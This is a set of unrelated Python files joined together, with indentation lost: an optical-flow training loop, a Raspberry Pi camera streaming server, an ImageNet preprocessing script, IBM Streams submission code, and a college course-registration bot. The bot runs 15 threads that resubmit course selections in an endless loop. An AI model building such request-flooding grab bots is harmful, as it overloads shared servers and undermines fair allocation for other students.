raise NotImplementedError
print('Using {}s'.format(default_timer() - t0))
sys.stdout.flush()
#
assert batch_size % len(ctx) == 0
batch_size_card = batch_size // len(ctx)
orig_shape = dataset_cfg.orig_shape.get(orig_shape)
target_shape = dataset_cfg.target_shape.get([shape_axis + (64 - shape_axis) % 64 for shape_axis in orig_shape])
print('original shape: ' + str(orig_shape))
print('target shape: ' + str(target_shape))
sys.stdout.flush()
# create log file
log = logger.FileLog(os.path.join(repoRoot, 'logs', 'debug' if args.debug else '', '{}.log'.format(run_id)))
log.log('start={}, train={}, val={}, host={}, batch={}'.format(steps, trainSize, validationSize, socket.gethostname(), batch_size))
information = ', '.join(['{}={}'.format(k, repr(args.__dict__[k])) for k in args.__dict__])
log.log(information)
# implement data augmentation
import augmentation
# chromatic augmentation
aug_func = augmentation.ColorAugmentation
if dataset_cfg.dataset.value == 'sintel':
color_aug = aug_func(contrast_range=(-0.4, 0.8), brightness_sigma=0.1, channel_range=(0.8, 1.4), batch_size=batch_size_card,
shape=target_shape, noise_range=(0, 0), saturation=0.5, hue=0.5, eigen_aug = False)
elif dataset_cfg.dataset.value == 'kitti':
color_aug = aug_func(contrast_range=(-0.2, 0.4), brightness_sigma=0.05, channel_range=(0.9, 1.2), batch_size=batch_size_card,
shape=target_shape, noise_range=(0, 0.02), saturation=0.25, hue=0.1, gamma_range=(-0.5, 0.5), eigen_aug = False)
else:
color_aug = aug_func(contrast_range=(-0.4, 0.8), brightness_sigma=0.1, channel_range=(0.8, 1.4), batch_size=batch_size_card,
shape=target_shape, noise_range=(0, 0.04), saturation=0.5, hue=0.5, eigen_aug = False)
color_aug.hybridize()
# geometric augmentation
aug_func = augmentation.GeometryAugmentation
if dataset_cfg.dataset.value == 'sintel':
geo_aug = aug_func(angle_range=(-17, 17), zoom_range=(1 / 1.5, 1 / 0.9), aspect_range=(0.9, 1 / 0.9), translation_range=0.1,
target_shape=target_shape, orig_shape=orig_shape, batch_size=batch_size_card,
relative_angle=0.25, relative_scale=(0.96, 1 / 0.96), relative_translation=0.25
)
elif dataset_cfg.dataset.value == 'kitti':
geo_aug = aug_func(angle_range=(-5, 5), zoom_range=(1 / 1.25, 1 / 0.95), aspect_range=(0.95, 1 / 0.95), translation_range=0.05,
target_shape=target_shape, orig_shape=orig_shape, batch_size=batch_size_card,
relative_angle=0.25, relative_scale=(0.98, 1 / 0.98), relative_translation=0.25
)
else:
geo_aug = aug_func(angle_range=(-17, 17), zoom_range=(0.5, 1 / 0.9), aspect_range=(0.9, 1 / 0.9), translation_range=0.1,
target_shape=target_shape, orig_shape=orig_shape, batch_size=batch_size_card,
relative_angle=0.25, relative_scale=(0.96, 1 / 0.96), relative_translation=0.25
)
geo_aug.hybridize()
def index_generator(n):
indices = np.arange(0, n, dtype=np.int)
while True:
np.random.shuffle(indices)
yield from indices
class MovingAverage:
def __init__(self, ratio=0.95):
self.sum = 0
self.weight = 1e-8
self.ratio = ratio
def update(self, v):
self.sum = self.sum * self.ratio + v
self.weight = self.weight * self.ratio + 1
@property
def average(self):
return self.sum / self.weight
class DictMovingAverage:
def __init__(self, ratio=0.95):
self.sum = {}
self.weight = {}
self.ratio = ratio
def update(self, v):
for key in v:
if key not in self.sum:
self.sum[key] = 0
self.weight[key] = 1e-8
self.sum[key] = self.sum[key] * self.ratio + v[key]
self.weight[key] = self.weight[key] * self.ratio + 1
@property
def average(self):
return dict([(key, self.sum[key] / self.weight[key]) for key in self.sum])
loading_time = MovingAverage()
total_time = MovingAverage()
train_avg = DictMovingAverage()
from threading import Thread
from queue import Queue
def iterate_data(iq, dataset):
gen = index_generator(len(dataset[0]))
while True:
i = next(gen)
data = [item[i] for item in dataset]
space_x, space_y = data[0].shape[0] - orig_shape[0], data[0].shape[1] - orig_shape[1]
crop_x, crop_y = space_x and np.random.randint(space_x), space_y and np.random.randint(space_y)
data = [np.transpose(arr[crop_x: crop_x + orig_shape[0], crop_y: crop_y + orig_shape[1]], (2, 0, 1)) for arr in data]
# vertical flip
if np.random.randint(2):
data = [arr[:, :, ::-1] for arr in data]
data[2] = np.stack([-data[2][0, :, :], data[2][1, :, :]], axis = 0)
iq.put(data)
def batch_samples(iqs, oq, batch_size):
while True:
data_batch = []
for iq in iqs:
for i in range(batch_size // len(iqs)):
data_batch.append(iq.get())
oq.put([np.stack(x, axis=0) for x in zip(*data_batch)])
def remove_file(iq):
while True:
f = iq.get()
try:
os.remove(f)
except OSError as e:
log.log('Remove failed' + e)
batch_queue = Queue(maxsize=10)
remove_queue = Queue(maxsize=50)
def start_daemon(thread):
thread.daemon = True
thread.start()
data_queues = [Queue(maxsize=100) for _ in training_datasets]
for data_queue, dataset in zip(data_queues, training_datasets):
start_daemon(Thread(target=iterate_data, args=(data_queue, dataset)))
start_daemon(Thread(target=remove_file, args=(remove_queue,)))
for i in range(1):
start_daemon(Thread(target=batch_samples, args=(data_queues, batch_queue, batch_size)))
t1 = None
checkpoints = []
while True:
steps += 1
if not pipe.set_learning_rate(steps):
sys.exit(0)
batch = []
t0 = default_timer()
if t1:
total_time.update(t0 - t1)
t1 = t0
batch = batch_queue.get()
loading_time.update(default_timer() - t0)
# with or without the given invalid mask
if len(batch) == 4:
img1, img2, flow, mask = [batch[i] for i in range(4)]
train_log = pipe.train_batch(img1, img2, flow, geo_aug, color_aug, mask = mask)
else:
img1, img2, flow = [batch[i] for i in range(3)]
train_log = pipe.train_batch(img1, img2, flow, geo_aug, color_aug)
# update log
if steps <= 20 or steps % 50 == 0:
train_avg.update(train_log)
log.log('steps={}{}, total_time={:.2f}'.format(steps, ''.join([', {}={}'.format(k, v) for k, v in train_avg.average.items()]), total_time.average))
# do valiation
if steps % validation_steps == 0 or steps <= 1:
val_result = None
if validationSize > 0:
val_result = validate()
log.log('steps={}{}'.format(steps, ''.join([', {}={}'.format(k, v) for k, v in val_result.items()])))
# save parameters
if steps % checkpoint_steps == 0:
prefix = os.path.join(repoRoot, 'weights', '{}_{}'.format(run_id, steps))
pipe.save(prefix)
checkpoints.append(prefix)
# remove the older checkpoints
while len(checkpoints) > 3:
prefix = checkpoints[0]
checkpoints = checkpoints[1:]
remove_queue.put(prefix + '.params')
remove_queue.put(prefix + '.states')
|
main.py
|
import requests
from PIL import Image
from bs4 import BeautifulSoup
import copy
import time
import re
import os
import json
import threading
import csv
class Spider:
class Lesson:
def __init__(self, name, code, teacher_name, Time, number):
self.name = name
self.code = code
self.teacher_name = teacher_name
self.time = Time
self.number = number
def show(self):
print(' name:' + self.name + ' code:' + self.code + ' teacher_name:' + self.teacher_name + ' time:' + self.time +' 余量:' + self.number)
def show_list(self):
return [self.name, self.code, self.teacher_name , self.time]
def __init__(self, url):
self.__uid = ''
self.__real_base_url = ''
self.__base_url = url
self.__name = ''
self.__base_data = {
'__EVENTTARGET': 'ddl_ywyl',
'__EVENTARGUMENT': '',
'ddl_kcxz': '',
'ddl_ywyl': '', # 指全部选中,包含有无余量,%CE%DE:无 %D3%D0:有,''代表全部
'ddl_kcgs': '',
'ddl_xqbs': '',
'ddl_sksj': '',
'TextBox1': '',
'dpkcmcGrid:txtChoosePage': '1',
'dpkcmcGrid:txtPageSize': '100',
'__VIEWSTATE': ''
}
self.__headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36',
}
self.session = requests.Session()
self.__now_lessons_number = 0
def __set_real_url(self):
'''
得到真实的登录地址(无Cookie)
获取Cookie(有Cookie)
:return: 该请求
'''
request = self.session.get(self.__base_url, headers=self.__headers)
real_url = request.url
if real_url != 'http://jw1.wzbc.edu.cn/' and real_url != 'http://jw1.wzbc.edu.cn/index.apsx':
self.__real_base_url = real_url[:len(real_url) - len('default2.aspx')]
else:
if real_url.find('index') > 0:
self.__real_base_url = real_url[:len(real_url) - len('index.aspx')]
else:
self.__real_base_url = real_url
return request
def __get_code(self):
'''
获取验证码
:return: 验证码
'''
if self.__real_base_url != 'http://jw1.wzbc.edu.cn/':
request = self.session.get(self.__real_base_url + 'CheckCode.aspx', headers=self.__headers)
else:
request = self.session.get(self.__real_base_url + 'CheckCode.aspx?', headers=self.__headers)
with open('code.jpg', 'wb')as f:
f.write(request.content)
im = Image.open('code.jpg')
im.show()
print('Please input the code:')
code = input()
return code
def __get_login_data(self, uid, password):
'''
得到登录包
:param uid: 学号
:param password: 密码
:return: 含登录包的data字典
'''
self.__uid = uid
request = self.__set_real_url()
soup = BeautifulSoup(request.text, 'lxml')
form_tag = soup.find('input')
__VIEWSTATE = form_tag['value']
code = self.__get_code()
data = {
'__VIEWSTATE': __VIEWSTATE,
'txtUserName': self.__uid,
'TextBox2': password,
'txtSecretCode': code,
'RadioButtonList1': '学生'.encode('gb2312'),
'Button1': '',
'lbLanguage': '',
'hidPdrs': '',
'hidsc': '',
}
return data
def login(self, uid, password):
'''
外露的登录接口
:param uid: 学号
:param password: 密码
:return: 抛出异常或返回是否登录成功的布尔值
'''
while True:
data = self.__get_login_data(uid, password)
if self.__real_base_url != 'http://jw1.wzbc.edu.cn/':
request = self.session.post(self.__real_base_url + 'Default2.aspx', headers=self.__headers, data=data)
else:
request = self.session.post(self.__real_base_url , headers=self.__headers, data=data)
soup = BeautifulSoup(request.text, 'lxml')
if request.status_code != requests.codes.ok: #判断是否发送成功
print('4XX or 5XX Error,try to login again')
time.sleep(0.5)
continue
if request.text.find('验证码不正确') > -1:
print('验证码错误')
continue
if request.text.find('密码错误') > -1:
print('密码错误')
return False
if request.text.find('用户名不存在') > -1:
print('用户名错误')
return False
try:
name_tag = soup.find(id='xhxm')
self.__name = name_tag.string[:len(name_tag.string) - 2]
print('欢迎' + self.__name)
self.__enter_lessons_first()
return True
except:
print('未知错误,尝试再次登录')
time.sleep(0.5)
continue
def __enter_lessons_first(self):
'''
首次进入选课界面
:return: none
'''
data = {
'xh': self.__uid,
'xm': self.__name.encode('gb2312'),
'gnmkdm': 'N121101',
}
self.__headers['Referer'] = self.__real_base_url + 'xs_main.aspx?xh=' + self.__uid
request = self.session.get(self.__real_base_url + 'xf_xsqxxxk.aspx', params=data, headers=self.__headers)
self.__headers['Referer'] = request.url
# print(request.text)
soup = BeautifulSoup(request.text, 'lxml')
# print(soup)
self.__set__VIEWSTATE(soup)
selected_lessons_pre_tag = soup.find('legend', text='已选课程')
selected_lessons_tag = selected_lessons_pre_tag.next_sibling
tr_list = selected_lessons_tag.find_all('tr')[1:]
self.__now_lessons_number = len(tr_list)
try:
xq_tag = soup.find('select', id='ddl_xqbs')
self.__base_data['ddl_xqbs'] = xq_tag.find('option')['value']
except:
pass
def __set__VIEWSTATE(self, soup):
__VIEWSTATE_tag = soup.find('input', attrs={'name': '__VIEWSTATE'})
self.__base_data['__VIEWSTATE'] = __VIEWSTATE_tag['value']
def __get_lessons(self, soup):
'''
提取传进来的soup的课程信息
:param soup:
:return: 课程信息列表
'''
lesson_list = []
lessons_tag = soup.find('table', id='kcmcGrid')
lesson_tag_list = lessons_tag.find_all('tr')[1:]
for lesson_tag in lesson_tag_list:
td_list = lesson_tag.find_all('td')
#code = td_list[0].input['name'] #td_list[0]是checkbox
#name = td_list[1].string #全是none,可忽略的变量
name = td_list[2].string #课程名
code = td_list[0].input['name'] #获取到的是课程编号
teacher_name = td_list[4].string #td_list[4]为教师名,对应课程编号
try:
Time = td_list[5]['title']
except:
Time = ''
number = td_list[11].string #td_list[11]余量
num=int(number)
# 是否要显示无余量的课程
# if num>0:
lesson = self.Lesson(name, code, teacher_name, Time, number)
lesson_list.append(lesson)
return lesson_list
def __search_lessons(self, lesson_name=''):
'''
搜索课程
:param lesson_name: 课程名字
:return: 课程列表
'''
self.__base_data['TextBox1'] = lesson_name.encode('gb2312')
data = self.__base_data.copy()
# data['Button2'] = '确定'.encode('gb2312')
request = self.session.post(self.__headers['Referer'], data=data, headers=self.__headers)
#print(request)
#print(request.text)
soup = BeautifulSoup(request.text, 'lxml')
#print(soup)
self.__set__VIEWSTATE(soup)
return self.__get_lessons(soup)
def __select_lesson(self, lesson_list):
'''
开始选课
:param lesson_list: 选的课程列表
:return: none
'''
data = copy.deepcopy(self.__base_data)
data['Button1'] = ' 提交 '.encode('gb2312')
while True:
for lesson in lesson_list:
try:
code = lesson.code
data[code] = 'on'
# data['kcmcGrid:_ctl2:xk']='on'
request = self.session.post(self.__headers['Referer'], data=data, headers=self.__headers,timeout=5)
except:
continue
start = time.time()
soup = BeautifulSoup(request.text, 'lxml')
self.__set__VIEWSTATE(soup)
error_tag = soup.html.head.script
if not error_tag is None:
error_tag_text = error_tag.string
r = "alert\('(.+?)'\);"
for s in re.findall(r, error_tag_text):
print(s)
selected_lessons_pre_tag = soup.find('legend', text='已选课程')
selected_lessons_tag = selected_lessons_pre_tag.next_sibling
tr_list = selected_lessons_tag.find_all('tr')[1:]
print('已选课程:')
for tr in tr_list:
td = tr.find('td')
print(td.string)
print()
def run(self,uid,password):
'''
开始运行
:return: none
'''
if self.login(uid, password):
for i in range(100):
self.__base_data['kcmcGrid:_ctl'+str(i+2)+':jcnr']='|||'
print('请选择南校区还是北校区(0/1):')
if(input()=='0'):
self.__base_data['ddl_xqbs']='3'
else:
self.__base_data['ddl_xqbs']='4'
# print(self.__base_data.keys())
print('请输入搜索课程名字,直接回车则显示全部可选课程')
lesson_name = input()
lesson_list = self.__search_lessons(lesson_name)
for i in range(len(lesson_list)):
print(i, end='')
lesson_list[i].show()
# if(self.__base_data['ddl_xqbs']=='3'):
# write_data(lesson_list, '南校区课程.csv')
# else:
# write_data(lesson_list, '北校区课程.csv')
print('请输入想选的课的id,id为每门课程开头的数字,如果没有课程显示,代表公选课暂无')
select_id = input().split(',')
# print(select_id)
# select_id = int(input())
select_list=[]
for ClsId in select_id:
select_list.append(lesson_list[int(ClsId)])
thread_list = list()
for i in range(15):
thread_list.append(threading.Thread(target=self.__select_lesson,args=(select_list,)))
for i in range(15):
thread_list[i].start()
for i in range(15):
thread_list[i].join()
def write_data(data, name):
file_name = name
with open(file_name, 'w', errors='ignore', newline='') as f:
f_csv = csv.writer(f)
for i in range(len(data)):
f_csv.writerow(data[i].show_list())
if __name__ == '__main__':
print('尝试登录...')
with open('config.json',encoding='utf-8')as f:
config = json.load(f)
url = config['url']
uid = config['student_number']
password = config['password']
spider = Spider(url)
spider.run(uid, password)
os.system("pause")
'''
212,213,215的print注释了,非关键print
'''
|
server.py
|
# Taken from https://github.com/waveform80/pistreaming/blob/master/server.py.
# Moved classes to it's own files
from subprocess import Popen, PIPE
from string import Template
from struct import Struct
from threading import Thread
from time import sleep, time
from http.server import HTTPServer, BaseHTTPRequestHandler
from wsgiref.simple_server import make_server
import picamera
from ws4py.server.wsgiutils import WebSocketWSGIApplication
from ws4py.websocket import WebSocket
from ws4py.server.wsgirefserver import (
WSGIServer,
WebSocketWSGIHandler,
WebSocketWSGIRequestHandler,
)
from BroadcastOutput import BroadcastOutput
from BroadcastThread import BroadcastThread
from Configuration import Configuration
from SteamingWebSocket import StreamingWebSocketFactory
from StreamHttpServer import StreamHttpServer
###########################################
# CONFIGURATION
WIDTH = 640
HEIGHT = 480
FRAMERATE = 24
HTTP_PORT = 8082
WS_PORT = 8084
COLOR = u'#444'
BGCOLOR = u'#333'
JSMPEG_MAGIC = b'jsmp'
JSMPEG_HEADER = Struct('>4sHH')
VFLIP = False
HFLIP = False
###########################################
# Config object so that it's easier to pass around
CONFIG = Configuration(
WIDTH,
HEIGHT ,
FRAMERATE ,
HTTP_PORT ,
WS_PORT ,
COLOR ,
BGCOLOR ,
JSMPEG_MAGIC ,
JSMPEG_HEADER ,
VFLIP,
HFLIP
)
###########################################
def wsFactory():
WebSocketWSGIHandler.http_version = '1.1'
websocket_server = make_server(
'', WS_PORT,
server_class=WSGIServer,
handler_class=WebSocketWSGIRequestHandler,
app=WebSocketWSGIApplication(handler_cls=StreamingWebSocketFactory(CONFIG)))
websocket_server.initialize_websockets_manager()
print('Creating websocket at %d' % WS_PORT)
# websocket_server.initialize_websockets_manager()
return websocket_server
def httpFactory():
return StreamHttpServer(CONFIG);
def broadcastFactory(camera: picamera.PiCamera):
return BroadcastOutput(camera);
def main():
print('Intializing Camera')
# ////
print(CONFIG);
with picamera.PiCamera() as camera:
camera.resolution = (WIDTH, HEIGHT)
camera.framerate = FRAMERATE
camera.vflip = VFLIP # flips image rightside up, as needed
camera.hflip = HFLIP # flips image left-right, as needed
sleep(2) # camera warm-up time
print('Initializing websockets server on port %d' % WS_PORT)
websocket_server = wsFactory()
websocket_thread = Thread(target=websocket_server.serve_forever)
print('Initializing HTTP server on port %d' % HTTP_PORT)
http_server = httpFactory()
http_thread = Thread(target=http_server.serve_forever)
print('Initializing broadcast thread')
output = broadcastFactory(camera)
broadcast_thread = BroadcastThread(output.converter, websocket_server)
print('Starting recording')
camera.start_recording(output, 'yuv')
try:
print('Starting websockets thread')
websocket_thread.start()
print('Starting HTTP server thread')
http_thread.start()
print('Starting broadcast thread')
broadcast_thread.start()
while True:
camera.wait_recording(1)
except KeyboardInterrupt:
pass
finally:
print('Stopping recording')
camera.stop_recording()
print('Waiting for broadcast thread to finish')
broadcast_thread.join()
print('Shutting down HTTP server')
http_server.shutdown()
print('Shutting down websockets server')
websocket_server.shutdown()
print('Waiting for HTTP server thread to finish')
http_thread.join()
print('Waiting for websockets thread to finish')
websocket_thread.join()
if __name__ == '__main__':
main()
|
prepare_imagenet.py
|
# Copyright 2019-2020 Stanislav Pidhorskyi
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Create a tfrecords for ImageNET. """
import sys
sys.path.insert('../..')
import os
import scipy.io as sio
import torch
from PIL import Image
import random
import argparse
from configs.defaults import get_cfg_defaults
import sys
import logging
import tensorflow as tf
from torchvision.transforms import functional as F
from torch.nn.functional import avg_pool2d
from utils import cache
import numpy as np
import tqdm
from multiprocessing import Pool
from threading import Thread
def process_fold(i, path, image_folds, train_root, wnid_to_indx, fixed=False):
writers = {}
for lod in range(8, 1, -1):
tfr_opt = tf.python_io.TFRecordOptions(tf.python_io.TFRecordCompressionType.NONE)
part_path = path % (lod, i)
os.makedirs(os.path.dirname(part_path), exist_ok=True)
tfr_writer = tf.python_io.TFRecordWriter(part_path, tfr_opt)
writers[lod] = tfr_writer
for s, image in image_folds[i]:
im = os.path.join(train_root, s, image)
img = Image.open(im)
if fixed:
img = F.resize(img, 288)
img = F.center_crop(img, 256)
else:
img = F.resize(img, 288)
img = F.center_crop(img, 288)
img = np.asarray(img)
if len(img.shape) == 2:
img = np.tile(img[:, :, None], (1, 1, 3))
img = img.transpose((2, 0, 1))
if img.shape[0] > 3:
img = img[:3]
for lod in range(8, 1, -1):
ex = tf.train.Example(features=tf.train.Features(feature={
'shape': tf.train.Feature(int64_list=tf.train.Int64List(value=img.shape)),
'label': tf.train.Feature(int64_list=tf.train.Int64List(value=[wnid_to_indx[s]])),
'data': tf.train.Feature(bytes_list=tf.train.BytesList(value=[img.tostring()]))}))
writers[lod].write(ex.SerializeToString())
image = torch.tensor(np.asarray(img, dtype=np.float32)).view(1, 3, img.shape[1], img.shape[2])
image_down = avg_pool2d(image, 2, 2).clamp_(0, 255).to('cpu', torch.uint8).view(3, image.shape[2] // 2,
image.shape[3] // 2).numpy()
img = image_down
for lod in range(8, 1, -1):
writers[lod].close()
def parse_meta_mat(devkit_root):
metafile = os.path.join(devkit_root, "data", "meta.mat")
meta = sio.loadmat(metafile, squeeze_me=True)['synsets']
nums_children = list(zip(*meta))[4]
meta = [meta[idx] for idx, num_children in enumerate(nums_children)
if num_children == 0]
idcs, wnids, classes = list(zip(*meta))[:3]
classes = [tuple(clss.split(', ')) for clss in classes]
idx_to_wnid = {idx: wnid for idx, wnid in zip(idcs, wnids)}
wnid_to_classes = {wnid: clss for wnid, clss in zip(wnids, classes)}
return idx_to_wnid, wnid_to_classes
def parse_val_groundtruth_txt(devkit_root):
file = os.path.join(devkit_root, "data",
"ILSVRC2012_validation_ground_truth.txt")
with open(file, 'r') as txtfh:
val_idcs = txtfh.readlines()
return [int(val_idx) for val_idx in val_idcs]
@cache
def get_names(train_root):
names = []
sets = os.listdir(train_root)
for s in sets:
images = os.listdir(os.path.join(train_root, s))
names += [(s, im) for im in images]
return names
def prepare_imagenet(cfg, logger):
devkit_root = "/data/datasets/ImageNet_bak/ILSVRC2012_devkit_t12"
idx_to_wnid, wnid_to_classes = parse_meta_mat(devkit_root)
val_idcs = parse_val_groundtruth_txt(devkit_root)
val_wnids = [idx_to_wnid[idx] for idx in val_idcs]
for i in range(1, 1001):
w = idx_to_wnid[i]
c = wnid_to_classes[w]
print("%d - %s" % (i, c))
wnid_to_indx = dict([(v, k - 1) for k, v in idx_to_wnid.items()])
torch.save((wnid_to_classes, val_wnids), os.path.join("", "meta"))
train_root = "/data/datasets/ImageNet_bak/raw-data/train"
validation_root = "/data/datasets/ImageNet_bak/raw-data/validation"
###
logger.info("Savingexamples")
path = 'dataset_samples/imagenet256x256'
os.makedirs(path, exist_ok=True)
k = 0
names = get_names(train_root)
random.shuffle(names)
for s, image in names:
im = os.path.join(train_root, s, image)
img = Image.open(im)
img = F.resize(img, 288)
img = F.center_crop(img, 256)
img = np.asarray(img)
if len(img.shape) == 2:
img = np.tile(img[:, :, None], (1, 1, 3))
img = img.transpose((2, 0, 1))
if img.shape[0] > 3:
img = img[:3]
img = img.transpose((1, 2, 0))
img = Image.fromarray(img)
img.save(path + '/' + str(k) + ".png")
k += 1
if k == 2000:
break
###
exit()
if True:
random.seed(0)
names = get_names(train_root)
random.shuffle(names)
folds = 16 # cfg.DATASET.PART_COUNT
image_folds = [[] for _ in range(folds)]
count_per_fold = len(names) // folds
for i in range(folds):
image_folds[i] += names[i * count_per_fold: (i + 1) * count_per_fold]
threads = []
for i in range(folds):
thread = Thread(target=process_fold, args=(i, cfg.DATASET.PATH, image_folds, train_root, wnid_to_indx, False))
thread.start()
threads.append(thread)
for i in range(folds):
threads[i].join()
if False:
random.seed(0)
names = get_names(validation_root)
random.shuffle(names)
folds = 1 # cfg.DATASET.PART_COUNT
image_folds = [[] for _ in range(folds)]
count_per_fold = len(names) // folds
for i in range(folds):
image_folds[i] += names[i * count_per_fold: (i + 1) * count_per_fold]
threads = []
for i in range(folds):
thread = Thread(target=process_fold, args=(i, cfg.DATASET.PATH_TEST, image_folds, validation_root, wnid_to_indx, True))
thread.start()
threads.append(thread)
for i in range(folds):
threads[i].join()
print(idx_to_wnid, wnid_to_classes)
def run():
parser = argparse.ArgumentParser(description="ALAE imagenet")
parser.add_argument(
"--config-file",
default="configs/imagenet.yaml",
metavar="FILE",
help="path to config file",
type=str,
)
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
args = parser.parse_args()
cfg = get_cfg_defaults()
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
logger = logging.getLogger("logger")
logger.setLevel(logging.DEBUG)
output_dir = cfg.OUTPUT_DIR
os.makedirs(output_dir, exist_ok=True)
ch = logging.StreamHandler(stream=sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s %(name)s %(levelname)s: %(message)s")
ch.setFormatter(formatter)
logger.addHandler(ch)
logger.info(args)
logger.info("Loaded configuration file {}".format(args.config_file))
with open(args.config_file, "r") as cf:
config_str = "\n" + cf.read()
logger.info(config_str)
logger.info("Running with config:\n{}".format(cfg))
prepare_imagenet(cfg, logger)
if __name__ == '__main__':
run()
|
context.py
|
# coding=utf-8
# Licensed Materials - Property of IBM
# Copyright IBM Corp. 2015,2017
"""Context for submission of applications.
The main function is :py:func:`submit` to submit
a :py:class:`~streamsx.topology.topology.Topology`
to a Streaming Analytics service or IBM® Streams instance for execution.
"""
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
try:
from future import standard_library
standard_library.install_aliases()
except (ImportError, NameError):
# nothing to do here
pass
from streamsx import rest
import logging
import os
import os.path
import json
import subprocess
import threading
import sys
import codecs
import tempfile
logger = logging.getLogger('streamsx.topology.context')
#
# Submission of a python graph using the Java Application API
# The JAA is reused to have a single set of code_createJSONFile that creates
# SPL, the toolkit, the bundle and submits it to the relevant
# environment
#
def submit(ctxtype, graph, config=None, username=None, password=None):
"""
Submits a `Topology` (application) using the specified context type.
Used to submit an application for compilation into a Streams application and
execution within an Streaming Analytics service or IBM Streams instance.
`ctxtype` defines how the application will be submitted, see :py:class:`ContextTypes`.
The parameters `username` and `password` are only required when submitting to an
IBM Streams instance and it is required to access the Streams REST API from the
code performing the submit. Accessing data from views created by
:py:meth:`~streamsx.topology.topology.Stream.view` requires access to the Streams REST API.
Args:
ctxtype(str): Type of context the application will be submitted to. A value from :py:class:`ContextTypes`.
graph(Topology): The application topology to be submitted.
config(dict): Configuration for the submission.
username(str): Username for the Streams REST api.
password(str): Password for `username`.
Returns:
SubmissionResult: Result of the submission. For details of what is contained see the :py:class:`ContextTypes`
constant passed as `ctxtype`.
"""
graph = graph.graph
if not graph.operators:
raise ValueError("Topology {0} does not contain any streams.".format(graph.topology.name))
context_submitter = _SubmitContextFactory(graph, config, username, password).get_submit_context(ctxtype)
return SubmissionResult(context_submitter.submit())
class _BaseSubmitter(object):
"""
A submitter which handles submit operations common across all submitter types..
"""
def __init__(self, ctxtype, config, graph):
self.ctxtype = ctxtype
self.config = dict()
if config is not None:
# Make copy of config to avoid modifying
# the callers config
self.config.update(config)
self.graph = graph
self.fn = None
self.results_file = None
def _config(self):
"Return the submit configuration"
return self.config
def submit(self):
# Convert the JobConfig into overlays
self._create_job_config_overlays()
# encode the relevant python version information into the config
self._add_python_info()
# Create the json file containing the representation of the application
try:
self._create_json_file(self._create_full_json())
except IOError:
logger.error("Error writing json graph to file.")
raise
tk_root = self._get_toolkit_root()
cp = os.path.join(tk_root, "lib", "com.ibm.streamsx.topology.jar")
streams_install = os.environ.get('STREAMS_INSTALL')
# If there is no streams install, get java from JAVA_HOME and use the remote contexts.
if streams_install is None:
java_home = os.environ.get('JAVA_HOME')
if java_home is None:
raise ValueError("JAVA_HOME not found. Please set the JAVA_HOME system variable")
jvm = os.path.join(java_home, "bin", "java")
submit_class = "com.ibm.streamsx.topology.context.remote.RemoteContextSubmit"
# Otherwise, use the Java version from the streams install
else:
jvm = os.path.join(streams_install, "java", "jre", "bin", "java")
if ConfigParams.FORCE_REMOTE_BUILD in self.config and self.config[ConfigParams.FORCE_REMOTE_BUILD]:
submit_class = "com.ibm.streamsx.topology.context.remote.RemoteContextSubmit"
else:
submit_class = "com.ibm.streamsx.topology.context.local.StreamsContextSubmit"
cp = cp + ':' + os.path.join(streams_install, "lib", "com.ibm.streams.operator.samples.jar")
args = [jvm, '-classpath', cp, submit_class, self.ctxtype, self.fn]
logger.info("Generating SPL and submitting application.")
proc_env = env=self._get_java_env()
process = subprocess.Popen(args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0, env=proc_env)
stderr_thread = threading.Thread(target=_print_process_stderr, args=([process, self]))
stderr_thread.daemon = True
stderr_thread.start()
stdout_thread = threading.Thread(target=_print_process_stdout, args=([process]))
stdout_thread.daemon = True
stdout_thread.start()
process.wait()
results_json = {}
# Only try to read the results file if the submit was successful.
if process.returncode == 0:
with open(self.results_file) as _file:
try:
results_json = json.loads(_file.read())
except IOError:
logger.error("Could not read file:" + str(_file.name))
raise
except json.JSONDecodeError:
logger.error("Could not parse results file:" + str(_file.name))
raise
except:
logger.error("Unknown error while processing results file.")
raise
_delete_json(self)
results_json['return_code'] = process.returncode
self._augment_submission_result(results_json)
self.submission_results = results_json
return results_json
def _augment_submission_result(self, submission_result):
"""Allow a subclass to augment a submission result"""
pass
def _get_java_env(self):
"Get the environment to be passed to the Java execution"
return dict(os.environ)
def _add_python_info(self):
# Python information added to deployment
pi = {}
pi["prefix"] = sys.exec_prefix
pi["version"] = sys.version
self.config["python"] = pi
def _create_job_config_overlays(self):
if ConfigParams.JOB_CONFIG in self.config:
jco = self.config[ConfigParams.JOB_CONFIG]
del self.config[ConfigParams.JOB_CONFIG]
jco._add_overlays(self.config)
def _create_full_json(self):
fj = dict()
# Removing Streams Connection object because it is not JSON serializable, and not applicable for submission
# Need to re-add it, since the StreamsConnection needs to be returned from the submit.
sc = self.config.pop(ConfigParams.STREAMS_CONNECTION, None)
fj["deploy"] = self.config.copy()
fj["graph"] = self.graph.generateSPLGraph()
_file = tempfile.NamedTemporaryFile(prefix="results", suffix=".json", mode="w+t", delete=False)
_file.close()
fj["submissionResultsFile"] = _file.name
self.results_file = _file.name
logger.debug("Results file created at " + _file.name)
self.config[ConfigParams.STREAMS_CONNECTION] = sc
return fj
def _create_json_file(self, fj):
if sys.hexversion < 0x03000000:
tf = tempfile.NamedTemporaryFile(mode="w+t", suffix=".json", prefix="splpytmp", delete=False)
else:
tf = tempfile.NamedTemporaryFile(mode="w+t", suffix=".json", encoding="UTF-8", prefix="splpytmp",
delete=False)
tf.write(json.dumps(fj, sort_keys=True, indent=2, separators=(',', ': ')))
tf.close()
self.fn = tf.name
def _setup_views(self):
# Link each view back to this context.
if self.graph.get_views():
for view in self.graph.get_views():
view._submit_context = self
def streams_connection(self):
raise NotImplementedError("Views require submission to DISTRIBUTED or ANALYTICS_SERVICE context")
# There are two modes for execution.
#
# Pypi (Python focused)
